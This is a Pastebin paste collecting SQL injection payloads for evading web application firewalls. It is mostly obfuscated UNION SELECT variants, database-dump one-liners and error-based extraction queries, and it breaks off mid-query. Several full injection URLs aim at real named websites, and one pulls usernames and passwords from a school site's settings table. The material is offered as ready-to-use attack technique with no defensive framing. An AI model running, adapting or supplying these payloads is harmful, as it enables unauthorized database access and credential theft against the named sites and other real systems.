Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ------------------------------Best Bypass WAF------------------------------------
- zen solution:::http://www.univcasa.ma/factualite.php?id=318999 UNIUNIONON+ALL+SELSELECTECT+1,2,3,4,5,6,7,8,9,10,11,12,CoNCat%0a(0x3c62723e3c666f6e7420636f6c6f723d5265642073697a653d333e496e6a3363743364204279205a656e3c62723e56657273696f6e203a20,version(),0x3c62723e557365722829203a20,user(),0x3c62723e4462617365203a20,dATAbASe(),(sELsELecTecT(@)frfromom(sELfromecT(@:=0x00),(sELfromecT(@)frfromom(`InFoRMAfromtiON_sCHeMa`.`ColUfromMNs`)whunionere(`TAbunionlE_sCHunionemA`=DatAbAsE())and(@)in(@:=CoNCat(@,0x3c62723e5461626c6520466f756e64203a20,TaBunionLe_nAMe,0x3a3a,coluunionmn_name))))a)),14,15,16,17%23
- gawd's solution::::http://www.univcasa.ma/factualite.php?id=-318++UNIunionON+ALL+SELSELECTECT+1,2,3,4,5,6,7,8,9,10,11,12,CONCAT%280x526168756c203a33,0x3c42723e,user%28%29,0x3c42723e,@@VERSION,0x3c42723e,%28SELESELECTCT%28@x%29FROFROMM%28SELESELECTCT%28@x:=0x00%29,%28@NR:=0%29,%28SELESELECTCT%280%29FROFROMM%28INFORMATIINFORMATION_SCHEMAON_SCHEMA.ColColumnsumns%29WHWHEREERE%28TABLE_STABLE_SCHEMACHEMA!=0x696e666f726d6174696f6e5f736368656d61%29AND%280x00%29IN%28@x:=CONCAT%28@x,LPAD%28@NR:=@NR%2b1,4,0x30%29,0x3a20,table_name,0x3a,column_ncolumn_nameame,0x3c62723e%29%29%29%29x%29%29,14,15,16,17--+-
- ashfaq bro's solution::: http://www.univcasa.ma/factualite.php?id=318 and 0 UnunionION SeLselectEct 1,2,3,4,5,6,7,8,9,0,11,12,concat('rootxx',version(),'<br>',(SeLselectEct (@x)frFROMom(SeLselectEct (@x:=0x00),(@NR:=0),(SeLselectEct (0)frFROMom(informationINFORMATION_SCHEMA_schema.TABLES)whWHEREere(tableTABLE_SCHEMA_schema!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,2,0x30),0x3a20,/*!12345Table_NSELECTamE*/,0x3c62723e))))x)),14,15,16,17--
- kazam gujjar :::http://www.univcasa.ma/factualite.php?id=-318888888888888+unUNIONion+ALL+seSELECTlect+1,2,3,4,5,6,7,8,9,10,11,12,concat%280x3c62723e,0x3c666f6e7420636f6c6f723d626c75652073697a653d35203e202d2d3d3d3e206b34346a3167756a6a34722068337233203c3d3d2d2d203c2f666f6e743e,0x3c62723e,0x56455253494f4e3d,version%28%29,0x3c62723e,0x555345523d,user%28%29,0x3c62723e,0x44423d,database%28%29,%20make_set%286,@:=0x0a,%28seSELECTlect%281%29frFROMom%28inINFORMATION_SCHEMAformation_schema.coCOLUMNSlumns%29whWHEREere%28taTABLE_SCHEMAble_schema!=0x696e666f726d6174696f6e5f736368656d61%29and@:=make_set%28511,@,0x3c6c693e,TaBlE_NaMe,coCOLUMN_NAMElumn_name%29%29,@%29%29,14,15,16,17--+
- very hard waf
- http://www.geneticsandsociety.org/article.php?id=305 and true Union%A0%20%20%
- 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
- 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
- 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
- 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20Select '0
- and false Un\ion Select c\oncat(0x3\c62723e3c666f6e7420636f6c6f723d7265643e72306f744
- 048335834393c2f666f6e743e3c666f6e7420636f6c6f723d677265656e3e,0x3\c62723e3c
- 666f6e7420636f6c6f723d626c75653e2056657273696f6e203a3a3a203c666f6e7420636f6
- c6f723d677265656e3e,v\ersion(),0x3\c62723e3c666f6e7420636f6c6f723d626c75653e20446174616261
- 7365203a3a3a203c666f6e7420636f6c6f723d677265656e3e,d\atabase(),0x3\c62723e3c666f6e7420636f
- 6c6f723d626c75653e2055736572203a3a3a3a203c666f6e7420636f6c6f723d677265656e3e,U\ser
- (),0x3\c62723e3c666f6e7420636f6c6f723d7265643e205461626c6573203a203c666f6e7420636f6
- c6f723d677265656e3e,c\oncat_ws(0x20,@:=0x00,(Select(t\able_name)fr\om(information_s\chema.
- t\ables)+wh\ere+(t\able_s\chema = d\atabase())+an\d@:=c\oncat_ws(0x20,@,0x3\c6c
- 693e3c666f6e7420636f6c6f723d7265643e,t\able_name,0x3\c2f666f6e743e)),@)),0x
- 32,0x33,0x34--'%20
- www.itpark.am/floor.php?lang=us&build=B'and@x:=C%5CON%5CCAT(ver%5Csion(),0x3a,data%5Cbase(),0x3a3a,u%5Cs%5Cer%5C(%5C),0x3c62723e,(SELE%5CCT+GROUP_CON%5CCAT(TAB%5CLE_NA%5CME+separator+0x3c6c693e)FR%5COM+INFORMATION_S%5CCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATA%5CBASE()))UNION+SELE%5CCT+CON%5CCAT(0x273e,0x3c62723e,'~m@db100d~',@x,0x3c212d2d)%60&floor=null&go=null
- [~] order by [~]
- /**/ORDER/**/BY/**/
- /*!order*/+/*!by*/
- /*!ORDER BY*/
- /*!50000ORDER BY*/
- /*!50000ORDER*//**//*!50000BY*/
- /*!12345ORDER*/+/*!BY*/
- [~] UNION select [~]
- /*!50000%55nIoN*/ /*!50000%53eLeCt*/
- %55nion(%53elect 1,2,3)-- -
- +union+distinct+select+
- +union+distinctROW+select+
- /**//*!12345UNION SELECT*//**/
- /**//*!50000UNION SELECT*//**/
- /**/UNION/**//*!50000SELECT*//**/
- /*!50000UniON SeLeCt*/
- union /*!50000%53elect*/
- + #?uNiOn + #?sEleCt
- + #?1q %0AuNiOn all#qa%0A#%0AsEleCt
- /*!%55NiOn*/ /*!%53eLEct*/
- /*!u%6eion*/ /*!se%6cect*/
- +un/**/ion+se/**/lect
- uni%0bon+se%0blect
- %2f**%2funion%2f**%2fselect
- union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
- REVERSE(noinu)+REVERSE(tceles)
- /*--*/union/*--*/select/*--*/
- union (/*!/**/ SeleCT */ 1,2,3)
- /*!union*/+/*!select*/
- union+/*!select*/
- /**/union/**/select/**/
- /**/uNIon/**/sEleCt/**/
- +%2F**/+Union/*!select*/
- /**//*!union*//**//*!select*//**/
- /*!uNIOn*/ /*!SelECt*/
- +union+distinct+select+
- +union+distinctROW+select+
- uNiOn aLl sElEcT
- UNIunionON+SELselectECT
- /**/union/*!50000select*//**/
- 0%a0union%a0select%09
- %0Aunion%0Aselect%0A
- %55nion/**/%53elect
- uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
- %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
- %0A%09UNION%0CSELECT%10NULL%
- /*!union*//*--*//*!all*//*--*//*!select*/
- union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
- /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
- +UnIoN/*&a=*/SeLeCT/*&a=*/
- union+sel%0bect
- +uni*on+sel*ect+
- +#1q%0Aunion all#qa%0A#%0Aselect
- union(select (1),(2),(3),(4),(5))
- UNION(SELECT(column)FROM(table))
- %23xyz%0AUnIOn%23xyz%0ASeLecT+
- %23xyz%0A%55nIOn%23xyz%0A%53eLecT+
- union(select(1),2,3)
- union (select 1111,2222,3333)
- uNioN (/*!/**/ SeleCT */ 11)
- union (select 1111,2222,3333)
- +#1q%0AuNiOn all#qa%0A#%0AsEleCt
- /**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
- %0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
- +%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
- +union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
- /*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
- +%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
- /*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
- /union\sselect/g
- /union\s+select/i
- /*!UnIoN*/SeLeCT
- +UnIoN/*&a=*/SeLeCT/*&a=*/
- +uni>on+sel>ect+
- +(UnIoN)+(SelECT)+
- +(UnI)(oN)+(SeL)(EcT)
- +’UnI”On’+'SeL”ECT’
- +uni on+sel ect+
- +/*!UnIoN*/+/*!SeLeCt*/+
- /*!u%6eion*/ /*!se%6cect*/
- uni%20union%20/*!select*/%20
- union%23aa%0Aselect
- /**/union/*!50000select*/
- /^.*union.*$/ /^.*select.*$/
- /*union*/union/*select*/select+
- /*uni X on*/union/*sel X ect*/
- +un/**/ion+sel/**/ect+
- +UnIOn%0d%0aSeleCt%0d%0a
- UNION/*&test=1*/SELECT/*&pwn=2*/
- un?<ion sel="">+un/**/ion+se/**/lect+
- +UNunionION+SEselectLECT+
- +uni%0bon+se%0blect+
- %252f%252a*/union%252f%252a /select%252f%252a*/
- /%2A%2A/union/%2A%2A/select/%2A%2A/
- %2f**%2funion%2f**%2fselect%2f**%2f
- union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
- /*!UnIoN*/SeLecT+
- [~] information_schema.tables [~]
- /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
- /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
- /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
- /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
- /*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
- /*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table
- [~] concat() [~]
- CoNcAt()
- concat()
- CON%08CAT()
- CoNcAt()
- %0AcOnCat()
- /**//*!12345cOnCat*/
- /*!50000cOnCat*/(/*!*/)
- unhex(hex(concat(table_name)))
- unhex(hex(/*!12345concat*/(table_name)))
- unhex(hex(/*!50000concat*/(table_name)))
- [~] group_concat() [~]
- /*!group_concat*/()
- gRoUp_cOnCAt()
- group_concat(/*!*/)
- group_concat(/*!12345table_name*/)
- group_concat(/*!50000table_name*/)
- /*!group_concat*/(/*!12345table_name*/)
- /*!group_concat*/(/*!50000table_name*/)
- /*!12345group_concat*/(/*!12345table_name*/)
- /*!50000group_concat*/(/*!50000table_name*/)
- /*!GrOuP_ConCaT*/()
- /*!12345GroUP_ConCat*/()
- /*!50000gRouP_cOnCaT*/()
- /*!50000Gr%6fuP_c%6fnCAT*/()
- unhex(hex(group_concat(table_name)))
- unhex(hex(/*!group_concat*/(/*!table_name*/)))
- unhex(hex(/*!12345group_concat*/(table_name)))
- unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
- unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
- unhex(hex(/*!50000group_concat*/(table_name)))
- unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
- unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
- convert(group_concat(table_name)+using+ascii)
- convert(group_concat(/*!table_name*/)+using+ascii)
- convert(group_concat(/*!12345table_name*/)+using+ascii)
- convert(group_concat(/*!50000table_name*/)+using+ascii)
- CONVERT(group_concat(table_name)+USING+latin1)
- CONVERT(group_concat(table_name)+USING+latin2)
- CONVERT(group_concat(table_name)+USING+latin3)
- CONVERT(group_concat(table_name)+USING+latin4)
- CONVERT(group_concat(table_name)+USING+latin5)
- [~] after id no. like id=1 +/*!and*/+1=0 [~]
- +div+0
- Having+1=0
- +AND+1=0
- +/*!and*/+1=0
- and(1)=(0)
- --'- : +--+ / : -- - : --+- : /*
- ) order by 1-- -
- ') order by 1-- -
- ')order by 1%23%23
- %')order by 1%23%23
- Null' order by 100--+
- Null' order by 9999--+
- ')group by 99-- -
- 'group by 119449-- -
- 'group/**/by/**/99%23%23
- union select ByPassing method
- +union+distinct+select+
- +union+distinctROW+select+
- /**//*!12345UNION SELECT*//**/
- /**//*!50000UNION SELECT*//**/
- +/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
- +/*!u%6eion*/+/*!se%6cect*/+
- /**/uniUNIONon/**/aALLll/**/selSELECTect/**/
- 1%')and(0)union(select(1),version(),3,4,5,6)%
- 23%23%23
- /*!50000%55nIoN*/+/*!50000%53eLeCt*/
- union /*!50000%53elect*/
- %55nion %53elect
- +--+Union+--+Select+--+
- +UnIoN/*&a=*/SeLeCT/*&a=*/
- id=1+’UnI”On’+'SeL”ECT’ <-MySQL only
- id=1+'UnI'||'on'+SeLeCT' <-MSSQL only
- UnIoN SeLeCt CoNcAt(version())--
- uNiOn aLl sElEcT
- uUNIONnion all sSELECTelect
- ==============================
- ==============================
- ==============================
- =========================================
- :: Buffer Overflow ::
- ==============================
- ==============================
- ==============================
- =========================================
- +And(select 1)=(select 0×414)+union+select+1–
- +And(select 1)=(select 0xAAAA)+union+select
- +1–
- +And(select 1)=(select 0×4141414141414
- 141414141414141414141414141414
- 141414141414141414141414141414
- 141414141414141414141414141414
- 141414141414141414141414141414
- 14141414141414141414 141414141414141
- 414141414141414141414141414141
- 41414141414141414141414141414141414
- 141414141414141414141414141414
- 141414141414141414141414141414
- 14141414141414141414 141414141414141
- 414141414141414141414141414141
- 41414141414141414141414141414141414
- 141414141414141414141414141414
- 141414141414141414141414141414
- 14141414141414141414 141414141414141
- 414141414141414141414141414141
- 41414141414141414141414141414141414
- 141414141414141414141414141414
- 141414141414141414141414141414
- 14141414141414141414 141414141414141
- 414141414141414141414141414141
- 41414141414141414141414141414141414
- 1414141)+
- +and (/*!select*/ 1)=(/*!select*/ 0xAA)+
- ==============================
- ==============================
- ==============================
- ========================================
- :: 400 Bad Request ::
- ==============================
- ==============================
- ==============================
- ========================================
- –+%0A
- union+select+1–+%0A,2–+%0A,3–+%0A,4–+
- %0A,5–+%0A –
- ==============================
- ==============================
- ==============================
- ========================================
- null the parameter
- ==============================
- ==============================
- ==============================
- ========================================
- id=-1
- id=null
- id=1+and+false+
- id=9999
- id=1 and 0
- id==1
- id=(-1)
- ==============================
- ==============================
- ==============================
- ==============================
- ===============
- Group_Concat
- ==============================
- ==============================
- ==============================
- ==============================
- ===============
- Group_Concat
- group_concat()
- /*!group_concat*/()
- grOUp_ConCat(/*!*/,0x3e,/*!*/)
- group_concat(,0x3c62723e)
- g%72oup_c%6Fncat%28%76%65rsion%28%29,
- %22~BlackRose%22%29
- CoNcAt()
- CONCAT(DISTINCT Version())
- concat(,0x3a,)
- concat%00()
- %00CoNcAt()
- /*!50000cOnCat*/(/*!Version()*/)
- /*!50000cOnCat*/
- /**//*!12345cOnCat*/(,0x3a,)
- concat_ws()
- concat(0x3a,,0x3c62723e)
- /*!concat_ws(0x3a,)*/
- concat_ws(0x3a3a3a,version()
- CONCAT_WS(CHAR(32,58,32),version(),)
- REVERSE(tacnoc)
- binary(version())
- uncompress(compress(version()))
- aes_decrypt(aes_encrypt(version(),1),1)
- ==============================
- ==============================
- ==============================
- ==============================
- ============
- To appear column numbr in page put after id
- ==============================
- ==============================
- ==============================
- ==============================
- ============
- id=1+and+1=0+union+select+1,2,3,4,5,6
- +AND+1=0
- /*!aND*/ 1 like 0
- +/*!and*/+1=0
- +and+2>3+
- +and(1)=(0)
- and (1)!=(0)
- +div+0
- Having+1=0
- ==============================
- ==============================
- ==============================
- =========================================
- function ByPassing
- ==============================
- ==============================
- ==============================
- =========================================
- unhex(hex(value))
- cast(value as char)
- uncompress(compress(version()))
- cast(version() as char)
- aes_decrypt(aes_encrypt(version(),1),1)
- binary(version())
- convert(value using ascii)
- ==============================
- ==============================
- ==============================
- =========================================
- avoid source page injection
- ==============================
- ==============================
- ==============================
- =========================================
- concat(?”>,<br><br><br>,@@version,?<img
- src=”,?<?’#)
- “><br>? <img src=”
- <img src=””/>injection<img src=”
- concat(0x223e,@@version)
- concat(0x273e27,version(),0x3c212d2d)
- concat(0x223e3c62723e,version
- (),0x3c696d67207372633d22)
- concat(0x223e,@@version,0x3c69
- 6d67207372633d22)
- concat(0x223e,0x3c62723e3c6272
- 3e3c62723e,@@version,0x3c696d6
- 7207372633d22,0x3c62723e)
- concat(0x223e3c62723e,@@versio
- n,0x3a,”BlackRose”,0x3c696d67207372633d22)
- concat(‘</title>’,@@version,’<title>’)
- concat(0x273c2f7469746c653e27,
- @@version,0x273c7469746c653e27)
- concat(0x273c2f7469746c653e27,version
- (),0x273c7469746c653e27)
- ==============================
- ==============================
- ==============================
- =========================================
- get version – DB_NAME – user – HOST_NAME –
- datadir
- ==============================
- ==============================
- ==============================
- =========================================
- version()
- convert(version() using latin1)
- unhex(hex(version()))
- @@GLOBAL.VERSION
- (substr(@@version,1,1)=5) :: 1 true 0 fals
- # like #
- http://www.marinaplast.com/page.php?id=-13
- union select 1,2,(substr(@@version,1,1)=5),4,5 –
- ==============================
- ==============================
- ==============================
- ========================================
- +and substring(version(),1,1)=4
- +and substring(version(),1,1)=5
- +and substring(version(),1,1)=9
- +and substring(version(),1,1)=10
- id=1 /*!50094aaaa*/ error
- id=1 /*!50095aaaa*/ no error
- id=1 /*!50096aaaa*/ error
- # like # http://www.marinaplast.com/page.php?
- id=13 /*!50095aaaa*/
- id=1 /*!40123 1=1*/–+- no error
- id=1 /*!40122rrrr*/ no error
- # like # http://www.marinaplast.com/page.php?
- id=13 /*!40122rrrr*/ error not v4
- ==============================
- ==============================
- ==============================
- =======================================
- DB_NAME()
- ==============================
- ==============================
- ==============================
- =======================================
- @@database
- database()
- id=vv()
- # like # http://www.marinaplast.com/page.php?
- id=-13 union select 1,2,DB_NAME(),4,5 –
- http://www.marinaplast.com/page.php?id=vv()
- @@user
- user()
- user_name()
- system_user()
- # like # http://www.marinaplast.com/page.php?
- id=-13 union select 1,2,user(),4,5 –
- HOST_NAME()
- @@hostname
- @@servername
- SERVERPROPERTY()
- # like # http://www.marinaplast.com/page.php?
- id=-13 union select 1,2,HOST_NAME(),4,5 –
- @@datadir
- datadir()
- # like # http://www.marinaplast.com/page.php?
- id=-13 union select 1,2,datadir(),4,5 –
- ASPX
- and 1=0/@@version
- ‘ and 1=0/@@version;–
- ‘) and 1=@@version–
- and 1=0/user;–
- Requested method
- [DUMP DB in 1 Request]
- (select (@) from (select(@:=0×00),(select (@)
- from (information_schema.columns) where
- (table_schema>=@) and (@)in (@:=concat(@,0x
- 0a,’ [ ',table_schema,' ] >’,table_name,’ >
- ‘,column_name))))x)
- (select(@) from (select (@:=0×00),(select (@)
- from (table) where (@) in (@:=concat(@,0x
- 0a,column1,0x3a,column2))))a)
- ==============================
- ==============================
- ==============================
- =========================================
- [DUMP DB in 1 Request improve]
- ==============================
- ==============================
- ==============================
- =========================================
- (select(@x)from(select(@x:=0×00),(select(0)fr
- om(information_schema.columns)where
- (table_schema!=0x696e666f726d6174696f6e5
- f736368656d61)and(0×00)in(@x:=concat
- (@x,0x3c62723e,table_schema,0x2e,table_
- name,0x3a,column_name))))x)
- like
- http://www.marinaplast.com/page.php?id=-13
- union select 1,2,(select(@x)from(select(@x:
- =0×00),(select(0)from(information_schema.colu
- mns)where(table_schema!=0x696e
- 666f726d6174696f6e5f736368656d61)and
- (0×00)in(@x:=c oncat(@x,0x3c62
- 723e,table_schema,0x2e,table_n
- ame,0x3a,column_name))))x),4,5 –
- ==============================
- ==============================
- ==============================
- =========================================
- #2#
- ==============================
- ==============================
- ==============================
- =========================================
- method like DUMP DB in 1 Request
- ==============================
- ==============================
- ==============================
- =========================================
- concat(@i:=0×00,@o:=0xd0a,benchmark
- (40,@o:=CONCAT( @o,0xd0a,(SELECT concat
- (table_schema,0x2E,@i:=table_name) FROM
- information_schema.tables WHERE
- table_name>@i order by table_name LIMIT 1)))
- like
- http://www.mishnetorah.com/shop/details.php?
- id=-26+union+select+1,2,3,concat
- (@i:=0×00,@o:=0xd0a,benchmark(
- 40,@o:=CONCAT(@o,0xd0a ,(SELECT concat
- (table_schema,0x2E,@i:=table_name) FROM
- information_schema.tables WHERE
- table_name>@i order by table_name LIMIT
- 1))),@o),5,6,7,8,9,10, 11,12,13,14,15,
- 16,17,18,19,20,21
- ==============================
- ==============================
- ==============================
- =========================================
- #3#
- ==============================
- ==============================
- ==============================
- =========================================
- databases
- (select+count(schema_name) +from+informati
- on_schema.schemata)
- # like #
- http://www.marinaplast.com/page.php?id=-13
- union select 1,2,(select+count(schema_name)
- +from+information_schema.schemata),4,5 –
- tables
- (select+count(table_name) +from+informati
- on_schema.tables)
- # like #
- http://www.marinaplast.com/page.php?id=-13
- union select 1,2,(select+count(table_name) +from
- +information_schema.tables),4,5 –
- columns
- (select+count(column_name) +from+informati
- on_schema.columns)
- # like #
- http://www.marinaplast.com/page.php?id=-13
- union select 1,2,(select+count(column_name)
- +from+information_schema.columns),4,5 –
- ==============================
- ==============================
- ==============================
- =========================================
- #4#
- ==============================
- ==============================
- ==============================
- =========================================
- show the table with all her columns
- CONCAT(table_name,0x3e,GROUP_CONCAT
- (column_name))
- +FROM information_schema.columns WHERE
- table_schema=database() GROUP BY table_name
- LIMIT 1,1–+
- like
- http://www.marinaplast.com/page.php?id=-13
- union select 1,2,CONCAT(table_name,0x3e,GRO
- UP_CONCAT(column_name)),4,5 +FROM
- information_schema.columns WHERE
- table_schema=database() GROUP BY table_name
- LIMIT 0,1–+
- ==============================
- ==============================
- ==============================
- =========================================
- #5#WWWWWWWWWWWAAAAAAAAAAAAAAAA
- AAFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
- ==============================
- ==============================
- ==============================
- =========================================
- feltered requested
- # tables #
- group_concat(/*!table_name*/)
- +/*!froM*/ /*!InfORmaTion_scHema*/.tAblES– -
- /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!
- WhERe*/ /*!TaBle_ScHEmA*/=schEMA()– -
- /*!From*/+%69nformation_schema./**/tAblES+/
- *!50000Where*/+/*!%54able_ScHEmA*/=schEMA
- ()– -
- ==============================
- ==============================
- ==============================
- =========================================
- # columns #
- ==============================
- ==============================
- ==============================
- =========================================
- group_concat(/*!column_name*/)
- +/*!froM*/ InfORmaTion_scHema.cOlumnS /*!
- WheRe*/ /*!tAblE_naMe*/=hex table
- /*!From*/+%69nformation_schema./**/columns
- +/*!50000Where*/+/*!%54able_name*/=hex
- table
- /*!froM*/ table– -
- ==============================
- ==============================
- ==============================
- =========================================
- #6#
- ==============================
- ==============================
- ==============================
- =========================================
- bypass method
- (select+group_concat(/*!table_name*/)+/*!
- From*/+%69nformation_schema./**/tAblES+/*!
- 50000Where*/+/*!%54able_ScHEmA*/=schEMA
- ())
- (select+group_concat(/*!column_name*/)+/*!
- From*/+%69nformation_schema./**/columns+/*!
- 50000Where*/+/*!%54able_name*/=hex table)
- like
- http://www.marinaplast.com/page.php?id=-13
- union select 1,2,(select+group_concat(/*!
- table_name*/)+/*!From*/+%69nformation_s
- chema./**/tAblES+/*!50000Where*/+/*!
- %54able_ScHEmA*/=schEMA()),4,5 –
- ==============================
- ==============================
- ==============================
- =========================================
- #7#
- ==============================
- ==============================
- ==============================
- =========================================
- bypass method
- unhex(hex(Concat(Column_Name,0
- x3e,Table_schema,0x3e,table_Name)))
- /*!from*/information_schema.columns/*!where*/
- column_name%20/*!like*/char(37,%20112,%
- 2097,%20115,%20115,%2037)
- like
- http://www.marinaplast.com/page.php?id=-13
- union select 1,2,unhex(hex(Concat(Column_Na
- me,0x3e,Table_schema,0x3e,tabl
- e_Name))),4,5 /*!from*/information_sche
- ma.columns/*!where*/column_name%20/*!like*/
- char(37,%20112,%2097,%20115,%20115,
- %2037)–
- ==============================
- ==============================
- ==============================
- =========================================
- [+] Union Select:
- ==============================
- ==============================
- ==============================
- =========================================
- union /*!select*/+
- union/**/select/**/
- /**/union/**/select/**/
- /**/union/*!50000select*/
- /**//*!12345UNION SELECT*//**/
- /**//*!50000UNION SELECT*//**/
- /**/uniUNIONon/**/selSELECTect/**/
- /**/uniUNIONon/**/aALLll/**/selSELECTect/**/
- /**//*!union*//**//*!select*//**/
- /**/UNunionION/**/SELselectECT/**/
- /**//*UnIOn*//**//*SEleCt*//**/
- /**//*U*//*n*//*I*//*O*//*n*//**//*S*//*E*//
- *l*//*e*//*C*//*t*//**/
- /**/UNunionION/**/all/**/SELselectECT/**/
- /**//*UnIOn*//**/all/**//*SEleCt*//**/
- /**//*U*//*n*//*I*//*O*//*n*//**//*all*//**//
- *S*//*E*//*l*//*e*//*C*//*t*//**/
- uni<on all sel<ect
- %20union%20/*!select*/%20
- union%23aa%0Aselect
- union+distinct+select+
- union+distinctROW+select+
- /*!20000%0d%0aunion*/+/*!20000%0d%0aSel
- Ect*/
- %252f%252a*/UNION%252f%252a /SELECT
- %252f%252a*/
- %23sexsexsex%0AUnIOn%23sexsexsex
- %0ASeLecT+
- /*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
- /*!u%6eion*/+/*!se%6cect*/+
- 1%’)and(0)union(select(1),version(),3,4,5,6)%
- 23%23%23
- /*!50000%55nIoN*/+/*!50000%53eLeCt*/
- union /*!50000%53elect*/
- +%2F**/+Union/*!select*/
- %55nion %53elect
- +–+Union+–+Select+–+
- +UnIoN/*&a=*/SeLeCT/*&a=*/
- uNiOn aLl sElEcT
- uUNIONnion all sSELECTelect
- union(select(1),2,3)
- union (select 1111,2222,3333)
- union (/*!/**/ SeleCT */ 11)
- %0A%09UNION%0CSELECT%10NULL%
- /*!union*//*–*//*!all*//*–*//*!select*/
- union%23foo*%2F*bar%0D%0Aselect%23foo
- %0D%0A1% 2C2%2C
- union+sel%0bect
- +uni*on+sel*ect+
- + #1q %0Aunion all#qa%0A#%0Aselect
- 1,2,3,4,5,6,7,8,9,10%0A#a
- union(select (1),(2),(3),(4),(5))
- UNION(SELECT(column)FROM(table))
- id=1+’UnI”On’+’SeL”ECT’ <-MySQL only
- id=1+’UnI’||’on’+SeLeCT’ <-MSSQL only
- union select 1–+%0A,2–+%0A,3–+%0A etc ….
- ==============================
- ==============================
- ==============================
- =========================================
- [+] Buffer overflow:
- ==============================
- ==============================
- ==============================
- =========================================
- +And(select 1)=(select 0×414)+union+select+1–
- +And(select 1)=(select 0xAAAA)+union+select
- +1–
- +and (/*!select*/ 1)=(/*!select*/ 0xAA)+
- +and (/*!select*/ 1)=(/*!select*/ 0×414)+
- +And(select 1)=(select 0×4141414141414
- 141414141414141414141414141414
- 141414141414141414141414141414?1414
- 141414141414141414141414141414
- 141414141414141414141414141414
- 14141414141414141414 141414141414141
- 414141414141414141414141414141
- 4141414141414141414141414141414?141
- 414141414141414141414141414141
- 414141414141414141414141414141
- 41414141414141414141 414141414141414
- 141414141414141414141414141414
- 14141414141414141414141414141414141
- 414141414141414141414141414141
- 414141414141414141414141414141
- 41414141414141414141 414141414141414
- 141414141414141414141414141414
- 14141414141414141414141414141414141
- 414141414141414141414141414141
- 414141414141414141414141414141
- 41414141414141414141 414141414141414
- 141414141414141414141414141414
- 14141414141414141414141414141414141 4141)+
- ==============================
- ==============================
- ==============================
- =========================================
- [+] Group Concat:
- ==============================
- ==============================
- ==============================
- =========================================
- Group_Concat
- group_concat()
- /*!group_concat*/()
- grOUp_ConCat(/*!*/,0x3e,/*!*/)
- group_concat(,0x3c62723e)
- g%72oup_c%6Fncat%28%76%65rsion%28%29,
- %22testtest%22%29
- CoNcAt()
- CONCAT(DISTINCT Version())
- concat(,0x3a,)
- concat%00()
- %00CoNcAt()
- /*!50000cOnCat*/(/*!Version()*/)
- /*!50000cOnCat*/
- /**//*!12345cOnCat*/(,0x3a,)
- concat_ws()
- concat(0x3a,,0x3c62723e)
- /*!concat_ws(0x3a,)*/
- concat_ws(0x3a3a3a,version()
- CONCAT_WS(CHAR(32,58,32),version(),)
- ==============================
- ==============================
- ==============================
- =========================================
- ERORE BASED
- ==============================
- ==============================
- ==============================
- =========================================
- =21 or 1 group by concat_ws(0x3a,version(),floor
- (rand(0)*2)) having min(0) or 1–
- Database
- 21 and (select 1 from (select count(*),concat
- ((select(select concat(cast(database() as
- char),0x7e)) from information_schema.tables
- where table_schema=database() limit 0,1),floor
- (rand(0)*2))x from information_schema.tables
- group by x)a)
- Table_name
- and (select 1 from (select count(*),concat((select
- (select concat(cast(table_name as char),0x7e))
- from information_schema.tables where
- table_schema=database() limit 19,1),floor(rand
- (0)*2))x from information_schema.tables group
- by x)a)
- Columns
- 21 and (select 1 from (select count(*),concat
- ((select(select concat(cast(column_name as
- char),0x7e)) from information_schema.columns
- where table_name=0x73657474696e6773 limit
- 2,1),floor(rand(0)*2))x from information_sch
- ema.tables group by x)a)
- extract date
- http://www.aliqbalschools.org/index.php?
- mode=getpagecontent&pageID=21 and (select 1
- from (select count(*),concat((select(select concat
- (cast(concat(userName,0x7e,passWord) as
- char),0x7e)) from iqbal_iqbal.settings limit
- 0,1),floor(rand(0)*2))x from information_sch
- ema.tables group by x)a)
- Notice the limit function in the query
- A website can have more than 2 two databases,
- so increase the limit until you find all database
- names
- Example: limit 0,1 or limit 1,1 or limit 2,1
- ==============================
- ==============================
- ==============================
- =========================================
- Differences:
- Error Based Query for Database Extraction:
- ==============================
- ==============================
- ==============================
- =========================================
- and (select 1 from (select count(*),concat((select
- (select concat(cast(database() as char),0x7e))
